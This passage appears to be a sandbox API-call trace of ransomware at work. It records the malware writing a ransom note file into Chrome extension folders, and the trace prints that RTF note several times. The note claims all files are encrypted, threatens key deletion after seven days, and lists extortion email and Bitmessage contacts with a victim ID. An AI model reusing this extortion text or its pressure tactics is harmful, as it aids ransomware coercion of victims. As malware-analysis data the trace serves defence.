}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.176] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.176] CloseHandle (hObject=0x2e8) returned 1 [0292.176] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0292.176] GetLastError () returned 0x2 [0292.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 